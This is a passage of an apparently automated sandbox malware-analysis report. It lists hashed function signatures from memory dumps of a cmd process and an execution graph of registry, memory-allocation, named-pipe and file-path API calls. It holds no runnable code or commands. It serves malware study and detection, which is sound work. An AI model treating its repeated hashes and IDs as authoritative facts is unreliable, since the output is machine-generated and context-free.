                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: 9b1308aefd0f06c372bfa43a87056a3a6d384427cd9b467a42a565f644c8fdeb
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: 2B118626E18A5811F6E417D8D8FD3B521E0EB6A3E8E480624A6F6066DEC62CC6414169
                                                                                                                                                            Function 00000230D90F3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: b735f479a6c8bea82008a6a828025691e8288be5b82de89db18ad06e55b78e00
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: 1B11C822D10A0909FB741DD8F4FD36918E9EFD87F4F4846B8AA66C62DE862CC7444270
                                                                                                                                                            Function 00000230D90EF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                            • Instruction ID: b7736759bcc1cb2bd760e49c346c71a172884c7647939bc28d738b3b0084222d
                                                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                            • Instruction Fuzzy Hash: 62618326F0164C4AF6659BE5F5EC3296EF4E789740F914D19EB0A877ACDB3CCA418220
                                                                                                                                                            Function 00000230D921AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction ID: 031633b825ee5b715e470277f3bc3164976821114738d0940e0a12eda17100fe
                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction Fuzzy Hash: CD617C37A00B888AEB60DFA5D4943AD77F4F358B98F144215EF4927B98DB38C6A5C710
                                                                                                                                                            Function 00000230D921AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction ID: 0ccfdc50ec13f30f4415da40912f0b3fa155c3f046e012bc2aae80bdc5e9afca
                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction Fuzzy Hash: A151BF729007888AEBB48F91A4E837977F0F354B95F144126DA89A7BD9CB3CC6B1C710
                                                                                                                                                            Function 00000230D90EA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction ID: 3aa239978cfc1857b49e2e827e3df7855d7f02654c378a4b071dfdde4f97fd66
                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction Fuzzy Hash: 0351B372900288CEEB748BA5B5A83687BF1F759B84F184915FA99C7BC9CB3CC650C710
                                                                                                                                                            Function 00000230D90E8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction ID: 915c95549526bca186e31185c522c807444723cd397ca8eb5e483cd5fb87127a
                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction Fuzzy Hash: 0C519033A016088EDB14CF95F498B193BF5F754B98F558925EE26C378CEB38DA418724
                                                                                                                                                            Function 00000230D90E83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction ID: f958c47e0e23d02a532fd22763df3c9e7faaf6fbaf9d49bb0bfa3e483a8cd6d6
                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction Fuzzy Hash: C7316A72A016449AE7249F91F8A87197BF4F740B98F158814EE6A8778CDB3CCA40C724
                                                                                                                                                            Function 00000230D9222058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                            • Instruction ID: f966c0b49ee9da82986b64fd7ebcaad2b79d5ff33baba4cf26eff372e86d285a
                                                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                            • Instruction Fuzzy Hash: 51D13232B04A8889E755CFB9D4A43EC3BF1F354798F404216CE59ABB9DDA39C60AC354
                                                                                                                                                            Function 00000230D92114A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3168794593-0
                                                                                                                                                            • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                                                                                            • Instruction ID: 25da930dae28582f4062e3b7797620ea8604874d8a2107f036fc51c58909e41e
                                                                                                                                                            • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                                                                                            • Instruction Fuzzy Hash: 32015E32A00BD8C6E744DFA6E99816E77F0F789F81F044426EA4953719DE3CD151C754
                                                                                                                                                            Function 00000230D9222980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                            • Instruction ID: 48854328f68be15ee6b2166105ef4d25e8ec6fd4c62c5bfab5c5860421203f3b
                                                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                            • Instruction Fuzzy Hash: DC91A532F1065885F7A89FA594E83BD2BF4F744B88F944109DE0657A9CDA3EC642C728
                                                                                                                                                            Function 00000230D9217960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction ID: a8ec3cc8889f481c582dbed460a60c7b26afd1e3978816ac6ed9055ca000c6e3
                                                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction Fuzzy Hash: 7F117026B11F0489EB40CFA0E8A93B933B4F319758F440E25DE6D427A8DF7CD2988390
                                                                                                                                                            Function 00000230D921253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction ID: 3e286a0b5dae6c79ed74259a2fdba8c85a8c68cb1d42be27b8428fc83eba41c2
                                                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction Fuzzy Hash: 9871F536A0078946E7A49FA598E83BA67F4F385784F440016ED0963B8DDE3DC752C310
                                                                                                                                                            Function 00000230D90E9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction ID: 3dd9ac58fcf21387159b6612d60bfa27d8578d662325695ff074e90b139d9303
                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction Fuzzy Hash: 84617672A01B888AEB20CFA5F49439D7BF0F348B88F144A15EF5957B98DB38D695C710
                                                                                                                                                            Function 00000230D9212330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction ID: 6d5dbbd7f9dc57b8c28980917da9a6ee5181fd22c9a462032f99f6b69c8e475c
                                                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction Fuzzy Hash: 8F51F832A0478981E6B8DBA9A0FC3BA67F1F385740F450115ED4923B5DDA3DC728C7A4
                                                                                                                                                            Function 00000230D92226F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                            • String ID: U
                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction ID: 42a746e993e077e5b6da31abbce1ba80853f0c847efde859882bdd51a227e5d1
                                                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction Fuzzy Hash: DD41A332B19B8482DB608F65E4983BA77F0F798794F804121EE4D87798DB7DC641C764
                                                                                                                                                            Function 00000230D92194A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction ID: 19792b63f473d4a2caea047ac2086b1876ccdc7c08c987883663286b06311976
                                                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction Fuzzy Hash: 12113D36614B8882EBA18F15F49436A77F5F788B94F584221EE8C17758DF3CC665CB04
                                                                                                                                                            Function 00000230D90E7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                            • Instruction ID: a23753ef11280d960b695bf8cfeea628244a1482aade4a76fef887c74756e10c
                                                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                            • Instruction Fuzzy Hash: A2E08661A44B4894DF168FA1F8942A837F0DB58B64F4991229D5C46315FA3CD3E9C310
                                                                                                                                                            Function 00000230D90E73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                            • Instruction ID: d32f0ce8e4a31b12cf73d96a610ca70371bafe1b5cf65d3905ba16d0c6429b4d
                                                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                            • Instruction Fuzzy Hash: DCE08661A04B4894DF158FA1F8901A877F0EB58B54F889122DD5C46355EA3CD3E5C310
                                                                                                                                                            Function 00000230D9211BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 756756679-0
                                                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction ID: a13fb94993c7ffa5905b483ca064c149a53470f53a14879d1a7454de288e0cb0
                                                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction Fuzzy Hash: 5A118F25A01B8881EA84DBA6E49923A73F1FB89FC0F184029DE4D5376ADF3CD552C310
                                                                                                                                                            Function 00000230D9211268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction ID: d08d7b697d176bc37abd2505de4a3f4d18ea75b2d743479c17cfaff7b5d72da2
                                                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction Fuzzy Hash: 9BE06D36A0160886EB448FA2D86C36F36F1FB89F06F04C024C90907355DF7D9599CB60

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:2%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:96.9%
                                                                                                                                                            Signature Coverage:6.2%
                                                                                                                                                            Total number of Nodes:194
                                                                                                                                                            Total number of Limit Nodes:20
                                                                                                                                                            execution_graph 14980 14e712828c8 14981 14e7128290e 14980->14981 14982 14e71282970 14981->14982 14984 14e71283844 14981->14984 14985 14e71283866 14984->14985 14986 14e71283851 StrCmpNIW 14984->14986 14985->14981 14986->14985 14987 14e71283ab9 14990 14e71283a06 14987->14990 14988 14e71283a70 14989 14e71283a56 VirtualQuery 14989->14988 14989->14990 14990->14988 14990->14989 14991 14e71283a8a VirtualAlloc 14990->14991 14991->14988 14992 14e71283abb GetLastError 14991->14992 14992->14990 14993 14e7128253c 14994 14e712825bb 14993->14994 14995 14e7128261d GetFileType 14994->14995 15006 14e712827aa 14994->15006 14996 14e7128262b StrCpyW 14995->14996 14997 14e71282641 14995->14997 14998 14e71282650 14996->14998 15009 14e71281a40 GetFinalPathNameByHandleW 14997->15009 15002 14e7128265a 14998->15002 15007 14e712826ff 14998->15007 15000 14e71283844 StrCmpNIW 15000->15002 15001 14e71283844 StrCmpNIW 15001->15007 15002->15000 15002->15006 15014 14e71283044 StrCmpIW 15002->15014 15018 14e71281cac 15002->15018 15005 14e71283044 4 API calls 15005->15007 15007->15001 15007->15005 15007->15006 15008 14e71281cac 2 API calls 15007->15008 15008->15007 15010 14e71281aa9 15009->15010 15011 14e71281a6a StrCmpNIW 15009->15011 15010->14998 15011->15010 15012 14e71281a84 lstrlenW 15011->15012 15012->15010 15013 14e71281a96 StrCpyW 15012->15013 15013->15010 15015 14e71283076 StrCpyW StrCatW 15014->15015 15016 14e7128308d PathCombineW 15014->15016 15017 14e71283096 15015->15017 15016->15017 15017->15002 15019 14e71281cc3 15018->15019 15020 14e71281ccc 15018->15020 15022 14e7128152c 15019->15022 15020->15002 15023 14e7128157c 15022->15023 15026 14e71281546 15022->15026 15023->15020 15024 14e7128155d StrCmpIW 15024->15026 15025 14e71281565 StrCmpW 15025->15026 15026->15023 15026->15024 15026->15025 15027 14e71281abc 15033 14e71281628 GetProcessHeap 15027->15033 15029 14e71281ad2 Sleep SleepEx 15031 14e71281acb 15029->15031 15031->15029 15032 14e71281598 StrCmpIW StrCmpW 15031->15032 15078 14e712818b4 15031->15078 15032->15031 15034 14e71281648 _invalid_parameter_noinfo 15033->15034 15095 14e71281268 GetProcessHeap 15034->15095 15036 14e71281650 15037 14e71281268 2 API calls 15036->15037 15038 14e71281661 15037->15038 15039 14e71281268 2 API calls 15038->15039 15040 14e7128166a 15039->15040 15041 14e71281268 2 API calls 15040->15041 15042 14e71281673 15041->15042 15043 14e7128168e RegOpenKeyExW 15042->15043 15044 14e712818a6 15043->15044 15045 14e712816c0 RegOpenKeyExW 15043->15045 15044->15031 15046 14e712816e9 15045->15046 15047 14e712816ff RegOpenKeyExW 15045->15047 15106 14e712812bc RegQueryInfoKeyW 15046->15106 15049 14e7128173a RegOpenKeyExW 15047->15049 15050 14e71281723 15047->15050 15053 14e7128175e 15049->15053 15054 14e71281775 RegOpenKeyExW 15049->15054 15099 14e7128104c RegQueryInfoKeyW 15050->15099 15051 14e712816f5 RegCloseKey 15051->15047 15058 14e712812bc 11 API calls 15053->15058 15055 14e71281799 15054->15055 15056 14e712817b0 RegOpenKeyExW 15054->15056 15060 14e712812bc 11 API calls 15055->15060 15061 14e712817eb RegOpenKeyExW 15056->15061 15062 14e712817d4 15056->15062 15059 14e7128176b RegCloseKey 15058->15059 15059->15054 15063 14e712817a6 RegCloseKey 15060->15063 15065 14e71281826 RegOpenKeyExW 15061->15065 15066 14e7128180f 15061->15066 15064 14e712812bc 11 API calls 15062->15064 15063->15056 15067 14e712817e1 RegCloseKey 15064->15067 15069 14e7128184a 15065->15069 15070 14e71281861 RegOpenKeyExW 15065->15070 15068 14e7128104c 4 API calls 15066->15068 15067->15061 15073 14e7128181c RegCloseKey 15068->15073 15074 14e7128104c 4 API calls 15069->15074 15071 14e7128189c RegCloseKey 15070->15071 15072 14e71281885 15070->15072 